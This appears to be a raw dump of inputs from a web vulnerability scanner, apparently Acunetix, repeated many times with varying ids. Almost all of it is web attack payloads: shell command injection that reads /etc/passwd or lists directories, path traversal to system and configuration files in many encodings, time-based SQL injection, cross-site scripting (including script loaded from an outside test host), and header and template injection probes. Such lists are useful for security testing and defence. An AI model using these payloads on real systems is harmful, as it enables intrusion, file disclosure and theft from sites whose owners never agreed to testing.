SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(934615))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1

1

1

-1

1<iframe src='data:text/html

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

-1)

1<body onload=prompt(960284)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${99183+99381}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952427)>

|cat /etc/passwd#

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n907681=v954761

)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

j0apDBi0'

'|'ld

1

1<img src=xyz OnErRor=prompt(978473)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

wjDLc8Xg')

1<img/src=">" onerror=alert(959250)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

9Ipb9LPI'))

/etc/passwd

^(#$!@#$)(()))******

1

1

'

'"()

1<ScRiPt%20>prompt(996250)</sCripT>

testasp.vulnweb.com

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1&lt

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1)

1

\xf6<img acu onmouseover=prompt(905729) //\xf6>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(922020)>

1

"

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://hit1Fd41z48TU.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

1

blUxvLx2'

1

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

file:///etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

&dir

1

GQUPRfws')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1_gVMnN <ScRiPt >prompt(914883)</ScRiPt>

Nz3sc9ld'))

1

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

comments

1

|dir

1

1'"()&%<ScRiPt >prompt(903223)</ScRiPt>

'"

1

1

1

comments/.

WEB-INF\web.xml

'|dir

1

'"()&%<ScRiPt >prompt(998641)</ScRiPt>

<!--

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_952561

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu6154\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6154

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux1484\xc0\xbez1\xc0\xbcz2a\x90bcxuca1484

................windowswin.ini

1

1

1

1<ScRiPt >prompt(910772)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(980010)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(915079)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979346></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(958386)</ScRiPt>

WEB-INF/web.xml

1

response.write(9245682*9860030)

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(924405)">

1

1

'+response.write(9245682*9860030)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994242)"></g></svg>

1

&cat /etc/passwd&

1

1

"+response.write(9245682*9860030)+"

1

1

1<div style=width:expression(prompt(921449))>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1<body onload=prompt(961373)>

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

${99986+100061}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(924003)>

1

`cat /etc/passwd`

1&n981550=v990012

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(919806)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(981948)>

1

)

1

testasp.vulnweb.com

3KAErJz4'

1

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(954949)</sCripT>

Ap1NAw4s')

/etc/passwd

"|"ld

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1&lt

bTZz3WL2'))

^(#$!@#$)(()))******

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

\xf6<img acu onmouseover=prompt(945416) //\xf6>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1

1

1

1

1<input autofocus onfocus=prompt(996219)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitkWOJte6y7G.bxss.me/

1

-1)

"

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

file:///etc/passwd

1

comments

1

&dir

1_R9FGa <ScRiPt >prompt(954086)</ScRiPt>

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

2jIfg92Y'

'"

http://www.acunetix.tst

1

1

'&dir&'

1

1

A68sQEt0')

<!--

1

WEB-INF/web.xml

1

1

"&dir&"

1

1

1

l0Y6DGAK'))

|dir

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(906399)</ScRiPt>

1

1

1

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(968587)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1_983435

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4544\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4544

1

1

1

................windowswin.ini

acux8349\xc0\xbez1\xc0\xbcz2a\x90bcxuca8349

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(903278)</ScRiPt>

1

1

1

1<script>prompt(905681)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(965269)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950606></ScRiPt>

1

1

1<ScRiPt >prompt(918349)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(982061)">

&cat /etc/passwd&

1

response.write(9342377*9602493)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906095)"></g></svg>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9342377*9602493)+'

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(956983))>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

"+response.write(9342377*9602493)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(963637)>

1

${99507+99626}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952523)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n989109=v994201

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(925197)>

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

)

1

1<img/src=">" onerror=alert(931035)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

399rGhCS'

1

!(()&&!|*|*|

'"()

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

/etc/passwd

4977rinG')

1

1<ScRiPt%20>prompt(913230)</sCripT>

1

^(#$!@#$)(()))******

testasp.vulnweb.com

"

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

iiXT4sFr'))

1

1

1&lt

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

\xf6<img acu onmouseover=prompt(930487) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1))

1<input autofocus onfocus=prompt(945269)>

1

1

'&dir&'

4hdDJQIu'

1

acunetix_wvs_invalid_filename

http://hitJ5f0x9CkhM.bxss.me/

1

"&dir&"

1

<a href='http://www.acunetix.com'>website security</a>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Jl51NTTs')

1

file:///etc/passwd

1

comments

|dir

WHHEFXDd'))

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

1

'|dir

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

1

1_bb4wQ <ScRiPt >prompt(938318)</ScRiPt>

1'"()&%<ScRiPt >prompt(977186)</ScRiPt>

'"

comments/.

1

1

1

WEB-INF/web.xml

"|dir

1

1

<!--

1

'"()&%<ScRiPt >prompt(975807)</ScRiPt>

1

1

WEB-INF\web.xml

1

1_923772

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu4433\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4433

1

../../../../../../../../../../boot.ini

1

1

acux1083\xc0\xbez1\xc0\xbcz2a\x90bcxuca1083

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(996302)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(992536)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(917480)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976223></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(951206)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(968919)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964021)"></g></svg>

response.write(9001720*9656800)

1

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(967564))>

'+response.write(9001720*9656800)+'

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

"+response.write(9001720*9656800)+"

1

1

'&cat /etc/passwd&'

1<body onload=prompt(994869)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938612)>

"&cat /etc/passwd&"

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(975207)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

-1))

${99448+99824}

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(950864)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

hTMacJ8n'

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

)

1&n994300=v964514

1<ScRiPt%20>prompt(956415)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

m53k9WqU')

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

8CfCouQ2'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(986335) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

/etc/passwd

1

1

'

1

1

1

1<input autofocus onfocus=prompt(971698)>

-1)

"

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitLUvADkwz2I.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

pDthzgS2'

1

[url=http://www.acunetix.com]website security[/url]

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

http://www.acunetix.tst

MZGvm73C')

1

1

1_H5RiM <ScRiPt >prompt(945686)</ScRiPt>

comments

1

1

&dir

1

1

LE9jRWb8'))

1

'"

comments/.

1'"()&%<ScRiPt >prompt(922158)</ScRiPt>

1

'&dir&'

file:///etc/passwd

1

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(981161)</ScRiPt>

"&dir&"

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_957629

|dir

1

1

1

1

1

acu6037\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6037

'|dir

WEB-INF/web.xml

1

1

1

"|dir

acux7784\xc0\xbez1\xc0\xbcz2a\x90bcxuca7784

1

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(978686)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1<script>prompt(955054)</script>

1

1

1

1

1<ScRiPt >prompt(922846)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936730></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(974004)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(922793)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993807)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9056005*9790362)

1

1

1<div style=width:expression(prompt(999428))>

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9056005*9790362)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

"+response.write(9056005*9790362)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(996094)>

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

cat /etc/passwd

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911230)>

1

1

1

../../../../../../../../../../etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(979611)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100191+99708}

1

-1))

1

1

1<img/src=">" onerror=alert(978261)>

|cat /etc/passwd#

A4wIpeas'

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n915704=v960479

'|'ld

1

1

1<ScRiPt%20>prompt(939917)</sCripT>

YBCgfmjv')

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1

szH5zBpC'))

1

1&lt

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(989642) //\xf6>

1

^(#$!@#$)(()))******

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

'

1<input autofocus onfocus=prompt(999809)>

1

1

-1))

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

1

Z1hWLhxp'

1

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

http://hitWczTCKmh2W.bxss.me/

VSj5tQZs')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_b94Gy <ScRiPt >prompt(908476)</ScRiPt>

1

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

6VN0wCyq'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'&dir&'

1

comments

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

1

1

1

comments/.

1

|dir

<!--

1

1

1'"()&%<ScRiPt >prompt(989116)</ScRiPt>

1

1

1

'|dir

'"()&%<ScRiPt >prompt(981637)</ScRiPt>

file:///etc/passwd

1

1

"|dir

1

1

1

1

1

1_996557

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

acu5527\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5527

1

1

WEB-INF\web.xml

1

1

1

1

acux5950\xc0\xbez1\xc0\xbcz2a\x90bcxuca5950

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(946177)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(930730)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(905747)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957568></ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(928907)</ScRiPt>

1

response.write(9839515*9912905)

1

1

1<video><source onerror="javascript:prompt(973806)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9839515*9912905)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973798)"></g></svg>

1

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(937101))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9839515*9912905)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1<body onload=prompt(927050)>

1

1

1

WEB-INF/web.xml

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900775)>

1

-1)

1

WEB-INF\web.xml

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(973096)>

${99673+99860}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(956461)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

0oDooSxp'

)

1&n988834=v920437

'|'ld

1

1<ScRiPt%20>prompt(951263)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ARIVK6hK')

"|"ld

1

1

!(()&&!|*|*|

'

1&lt

eQvVUhU7'))

testasp.vulnweb.com

'"()

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(929413) //\xf6>

"

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(926175)>

1

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

http://hitCyaEFoctjz.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

JDll39A1'

1

||cat /etc/passwd

1

comments

vxVg73D1')

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

89KNPsm3'))

comments/.

1_l8i9L <ScRiPt >prompt(968211)</ScRiPt>

file:///etc/passwd

http://www.acunetix.tst

1

1

1

1

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"

1

"&dir&"

1'"()&%<ScRiPt >prompt(917971)</ScRiPt>

1

1

<!--

1

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(921560)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

1_936883

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu2390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2390

../../../../../../../../../../boot.ini

1

1

1

acux6757\xc0\xbez1\xc0\xbcz2a\x90bcxuca6757

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(920786)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(933426)</script>

1

1

1<ScRiPt >prompt(985230)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997242></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(948492)</ScRiPt>

1

1

response.write(9720025*9664803)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(989653)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9720025*9664803)+'

1

1

